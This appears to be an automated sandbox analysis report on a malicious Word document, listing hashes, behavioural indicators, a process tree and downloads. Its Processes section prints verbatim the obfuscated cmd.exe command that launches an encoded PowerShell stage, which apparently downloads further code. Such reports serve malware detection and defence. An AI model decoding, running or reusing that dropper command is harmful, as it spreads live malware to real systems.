Analysis
  max time kernel: 140s
  max time network: 152s
  platform: windows10-2004_x64
  resource: win10v2004-20240226-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 23-05-2024 10:53
Behavioral task: behavioral1
  Sample: JHL_D_3392853_28_08_2018.doc
  Resource: win7-20240508-en
Behavioral task: behavioral2
  Sample: JHL_D_3392853_28_08_2018.doc
  Resource: win10v2004-20240226-en
General
  Target: JHL_D_3392853_28_08_2018.doc
  Size: 83KB
  MD5: e4625136904c387f83100ce9861b2e21
  SHA1: 3b29428a6cea904abd2903d5623fd7094914fec6
  SHA256: 8db36a2bb5a769e6d5f1598734a7f26fcabed65197a0463a3ff1cc1486953d3c
  SHA512: 191b87540c3f9d8ae06dd0532e22dafab46f2ab247a682f40f1a5a7bbdaa5e3b14e900a9195ef1077421695f9dfa3525d3a2b950a4eece65ad9200d0b4eebd9d
  SSDEEP: 1536:JptJlmrJpmxlRw99NBO+aA7IrlnKchqXN076KC0It4oC:3te2dw99fx2vR1It4
Malware Config
Extracted
Signatures

Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 524 | 3508 | CMd.exe | 89

Blocklisted process makes network request (1 IoC)
  flow | pid | Process
  50 | 4380 | powershell.exe

An obfuscated cmd.exe command-line is typically used to evade detection. (1 IoC)
  pid | Process
  524 | CMd.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  pid | Process
  3508 | WINWORD.EXE (2 entries)

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid | Process
  4380 | powershell.exe (3 entries)

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description | pid | Process
  Token: SeDebugPrivilege | 4380 | powershell.exe

Suspicious use of SetWindowsHookEx (7 IoCs)
  pid | Process
  3508 | WINWORD.EXE (7 entries)

Suspicious use of WriteProcessMemory (4 IoCs)
  description | pid | Process | procid_target
  PID 3508 wrote to memory of 524 | 3508 | WINWORD.EXE | 97 (2 entries)
  PID 524 wrote to memory of 4380 | 524 | CMd.exe | 105 (2 entries)
Processes

[1] C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\JHL_D_3392853_28_08_2018.doc" /o ""
    PID: 3508
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\SYSTEM32\CMd.exe (child of PID 3508)
        Command line: CMd /v/r " ^sE^T ^ ^h^q^x==^=^A^Ag^AA^I^AACA^g^AA^IAAC^A^g^AAIAAC^A^gA^A^I^A^ACAg^AA^I^AACAgA^AI^A^0^H^A9Bw^e^Ag^G^AjBA^dAEGA^jBQf^As^D^ArB^QYA^UG^Ay^B^g^Y^As^D^A^O^B^wQ^A^Y^E^A^k^AAI^A0GA^lB^A^d^A^k^EAt^AQZ^AsGAvB^g^d^A^4G^AJ^Bw^OA^kC^AOBw^QAYEA^kAA^IAwCATB^Aa^AY^E^A^k^AAK^AUG^A^s^B^QaAYE^AkBQ^YA8^G^As^BgbAcHAv^B^AR^A^4C^A^y^BQ^Q^A^o^G^AkAweA^kH^A^y^B^A^dA^s^HAp^A^gT^A8^GA^GB^AJA^ACA^uBQ^a^A^ACATBAa^AYE^A^k^A^A^KAgG^A^jB^QYA^UG^AyBwbAY^GA^7^A^wJA^U^G^A4^B^QZA^4CAn^AwKAYGA2^B^A^U^A^QC^ArAwJ^Aw^FAn^A^wK^A^M^GA^pBA^b^A^I^G^A1B^AcAoD^A^2^Bg^b^A^U^GA^kAQPA4E^AD^B^gR^AQCA^7Aw^J^A^ADA^x^A^wN^AcCA^g^A^Q^P^A^ACAmBg^dAA^F^A^k^AwO^A^kC^AnAA^QAcCAoA^Ad^AkG^A^sBAc^AMFA^u^Aw^JAAF^A^t^B^wL^A0GAv^Bw^YA^4CAyBQ^YAQHAr^B^Q^bA^Q^HAzB^w^bAg^GAvAw^LA^o^DA^w^B^AdA^QHA^o^BAQAED^A^HBQM^AcGAp^Bgd^A^A^DA2^BwL^A0^GAvB^w^Y^A4C^AzBQZ^AI^HArB^Q^bA^EGA^5B^g^b^A^UH^Ak^BQb^Ak^GAuBQ^ZA^I^G^Av^AwL^A^oD^A^w^BAdA^Q^H^A^o^BAQ^A^MF^AyB^A^dA^YH^ATBQY^A^YE^AE^B^wLA^0^G^AvBw^Y^A^4C^Az^BQ^ZAMGAu^B^Q^Z^AMH^AzB^Q^ZAw^G^A^h^Bgc^A^UH^A0B^QYA4^GA^3Aw^L^A8CA6A^Ac^AQ^H^A0^B^A^a^AA^E^A3^A^wQ^AcH^AvAQ^b^A^8^G^A^j^B^g^LA4^G^AhBAb^AA^H^A^z^B^wc^A^U^GA^uB^Qa^A^MHA1B^g^YA^8G^A^uBA^ZA4G^Ah^B^wc^A^QHAvB^Qa^AQ^GA^p^B^g^M^A^8CAv^A^g^O^AAHA0BA^d^A^gG^A^ABQ^T^AgHA^KB^QW^A^sEAX^Bwd^A^EF^Av^A^wZ^A^I^H^AvB^g^LAM^GA^k^BgcA0C^A1B^Q^a^A^wG^A^h^B^w^L^A^8C^A^6^AAcA^QHA^0^BA^a^AcCA9^A^g^T^A^8^G^AG^B^A^J^AsD^A^0BgbA^U^G^Ap^BAb^AM^EAi^BQ^Z^AcFAu^A^AdAU^GA^O^BAIA^QH^A^j^BQZ^A^o^GAi^B^w^bA^0C^A^3BQZA^4^GA^9A^gc^AEEAqB^AJ ^e- ^l^le^h^sr^ewop& ^F^Or /^l %^Y ^In (^ ^9^8^9^ ^ ^ ^-^1 ^0)D^O ^s^E^t u^j^L^a=!u^j^L^a!!^h^q^x:~%^Y, 1!&^iF %^Y == ^0 CA^L^L %u^j^L^a:~^-^99^0% "
        PID: 524
        - Process spawned unexpected child process
        - An obfuscated cmd.exe command-line is typically used to evade detection.
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 524)
            Command line: powershell -e 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
            PID: 4380
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

[1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4092 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
    PID: 3436
Network
MITRE ATT&CK Enterprise v15
Downloads

File 1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

File 2
  Filesize: 7KB
  MD5: b8c6ad4b788e720c6b7b4fab70b81ad4
  SHA1: d0eba959434bd8dd359701789cf577b52f448be0
  SHA256: 925d31f83e732cea00ab6bccd98966ca16496864f65936b187a908b822594a15
  SHA512: 649a5d44c4307d2379c1c85352972c7013c7f720cec475b3e7a2a48ec513bb1c1bcd7a1021bd3c3fb46db2ab5dec0eddf9416ef92a63fb56dc586f5a897e5d6a